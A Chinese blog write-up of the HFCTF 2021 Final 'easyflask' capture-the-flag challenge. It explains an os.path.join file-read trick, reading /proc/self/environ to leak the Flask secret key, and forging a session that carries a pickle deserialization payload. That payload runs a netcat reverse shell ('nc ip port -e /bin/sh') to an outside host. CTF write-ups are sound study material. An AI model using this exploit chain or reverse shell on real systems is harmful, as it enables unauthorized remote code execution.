HFCTF-2021-Final-easyflask

最新推荐文章于 2023-07-06 17:11:55 发布
最新推荐文章于 2023-07-06 17:11:55 发布
阅读量1.6k 收藏 2
点赞数 1
分类专栏: # BUUCTF-Web 文章标签: python反序列化 ctf web安全 新星计划
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/117422046
版权

HFCTF-2021-Final-easyflask

考点

Python os.path.join trick、环境变量暴露敏感信息、pickle 反序列化 RCE、Flask Session 伪造

思路

  • 进入题目,hint提示/file?file=index.js,进去之后又提示Source at /app/source,获得源码信息
  • 注意 /file 路由,用户上传的 path 会被拼接到 static 目录后面,这里有个trick,当 os.path.join 的第二个参数为绝对路径时拼接的结果就是该绝对路径,用这里可以实现任意文件读取

在这里插入图片描述

  • /admin 路由里使用 pickle 模块直接将 session 里的内容反序列化了,pickle 模块实现了将 Python 对象序列化和反序列化的方法,这里涉及到一个魔法方法 __reduce__

在这里插入图片描述

  • 反序列化必然包含创建新对象的操作,如果 __reduce__ 里包含攻击代码就可以实现RCE,但是被反序列化的输出储存在 session 里,但是 session 数据都是 flask 加密过的,只有知道 secret_key 才能伪造 session 实现 RCE
  • 一般来说,secret_key 这样的数据传递给程序主要有以下方法:硬编码在代码里、写在配置文件里、通过环境变量传递给程序
  • 这里刚好是第三种情况,*nix 系统存在一个伪文件系统 /proc,结合前面的任意文件读取漏洞可以读取到自身的环境变量,即/file?file=/proc/self/environ,得到secret_key=secret_key=glzjin22948575858jfjfjufirijidjitg3uiiuuh
  • 接下来就是伪造 session 啦,修改源码里的 SECRET_KEY, 给 User 对象添加 __reduce__ 方法,用浏览器访问 / 拿到伪造号的Cookie
  • 需要注意:靶机是Linux环境,本地是Windows环境,这两个环境下dumps的结果中序列化字符串声明系统的标识符不同:Linux=>posix;Windows=>nt,需要将脚本放在Linux环境下生成序列化字符串

Payload

/app/source源码信息

#!/usr/bin/python3.6
import os
import pickle

from base64 import b64decode
from flask import Flask, request, render_template, session

app = Flask(__name__)
app.config["SECRET_KEY"] = "*******"

User = type('User', (object,), {
    'uname': 'test',
    'is_admin': 0,
    '__repr__': lambda o: o.uname,
})


@app.route('/', methods=('GET',))
def index_handler():
    if not session.get('u'):
        u = pickle.dumps(User())
        session['u'] = u
    return "/file?file=index.js"


@app.route('/file', methods=('GET',))
def file_handler():
    path = request.args.get('file')
    path = os.path.join('static', path)
    if not os.path.exists(path) or os.path.isdir(path) \
            or '.py' in path or '.sh' in path or '..' in path or "flag" in path:
        return 'disallowed'

    with open(path, 'r') as fp:
        content = fp.read()
    return content


@app.route('/admin', methods=('GET',))
def admin_handler():
    try:
        u = session.get('u')
        if isinstance(u, dict):
            u = b64decode(u.get('b'))
        u = pickle.loads(u)
    except Exception:
        return 'uhh?'

    if u.is_admin == 1:
        return 'welcome, admin'
    else:
        return 'who are you?'


if __name__ == '__main__':
    app.run('0.0.0.0', port=80, debug=False)

/proc/self/environ内容

在这里插入图片描述

Payload构造

import pickle
from base64 import b64encode
import os

User = type('User', (object,), {
    'uname': 'test',
    'is_admin': 1,
    '__repr__': lambda o: o.uname,
    '__reduce__': lambda o: (eval, ("__import__('os').system('nc ip port -e /bin/sh')",))

})
u = pickle.dumps(User())
print(b64encode(u).decode())
H3rmesk1t
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hibernate jar包:hibernate-commons-annotations-4.0.1.Final.jar等
03-31
hibernate-commons-annotations-4.0.1.Final.jar hibernate-core-4.1.12.Final.jar hibernate-ehcache-4.1.12.Final.jar hibernate-entitymanager-4.1.12.Final.jar hibernate-jpa-2.0-api-1.0.1.Final.jar ...
hibernate-release-5.3.7.Final
11-27
hibernate-release-5.3.7.Final
[HFCTF 2021 Final]easyflask
errorr0
05-20 1747
Python反序列化刷题记录
hibernate-core-5.4.24.Final.jar
12-10
hibernate-core-5.4.24.Final.jar
MIDS-251-2021-Final-Project
03-29
MIDS-251-2021-最终项目S3水桶s3://w251-covidx-ctAWS EC2实例以下步骤将用于启动EC2实例以进行模型训练。 (注意:必须预先设置awscli) Deep Learning AMI (Ubuntu 18.04) Version 32.0 - ami-0dc2264cd927ca9eb...
hibernate-commons-annotations-5.1.0.Final.jar
12-10
hibernate-commons-annotations-5.1.0.Final.jar
buuctf--easyflask
qq_46263951的博客
01-04 870
根据提示访问/file?file=index.js,可以看到提示源码在/app/source #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type
[HFCTF 2021] final web复现
weixin_63231007的博客
07-06 642
flasksession伪造&pickle反序列化 + Laravel&phar反序列化 + exp()溢出盲注
ctfshow_愚人杯WEBeasy_flask
XiaoXiao_RenHe的专栏
04-20 915
ctfshow愚人杯WEBeasy_flask重现步骤,cookie内容调整方法。
[HFCTF 2021 Final]tinypng
weixin_45751765的博客
04-01 2670
0x00 前言 seebug复习一下phar在php反序列化中的利用 参考https://paper.seebug.org/680/ 写的太好了… 直接粘了 phar文件会以序列化的形式存储用户自定义的meta-data这一特性拓展了php反序列化的攻击面 phar文件结构 stub 类似标志,格式为xxx<?php xxx; __HALT_COMPILER();?>前面内容不限,但必须以__HALT_COMPILER();?>来结尾,否则phar扩展将无法识别这个文件为phar文件 m
2020巅峰极客Web题---Easy Flask
李熠专用博客_白帽子一枚,人称低危终结者
09-28 1660
看标题,猜测改网站用的事Flask框架,搜索引擎一搜,发现Flask存在模板注入漏洞: 于是大概可以推测,题目应该考察的是模板注入漏洞。 打开题目网址,有个登录页面,输入用户名,进入下面的页面: ...
jboss-threads-3.1.0.final
最新发布
08-09
JBoss Threads 是一个用于应用程序多线程管理的开源框架,版本为3.1.0.final。 JBoss Threads 提供了一套丰富的API,用于在Java应用程序中创建、管理和调度线程。它的目标是提供一种可靠、高效和灵活的方式来处理线程,在多线程环境下提高应用程序的性能和稳定性。 JBoss Threads 的主要特性包括: 1. 线程池管理:JBoss Threads 提供了线程池来管理线程的创建、销毁和复用。通过线程池,可以灵活地控制线程的数量和资源的分配,避免了频繁创建和销毁线程的开销。 2. 线程调度:JBoss Threads 提供了丰富的线程调度功能,包括线程优先级、线程组、线程间通信等。可以根据业务需求灵活地控制线程的执行顺序和并发度。 3. 异步执行:JBoss Threads 支持异步执行任务,可以在任务执行期间继续处理其他任务,提高了应用程序的并发性能和响应速度。 4. 内存管理:JBoss Threads 提供了内存回收机制,可以自动释放未使用的线程资源,避免内存泄漏和资源浪费。 5. 监控和统计:JBoss Threads 提供了丰富的监控和统计功能,可以实时跟踪和分析应用程序中的线程执行情况,帮助调优和排除故障。 总之,JBoss Threads 是一个功能强大、易于使用的线程管理框架,可以帮助开发者更好地管理和调度多线程应用程序,提高应用程序的性能和稳定性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值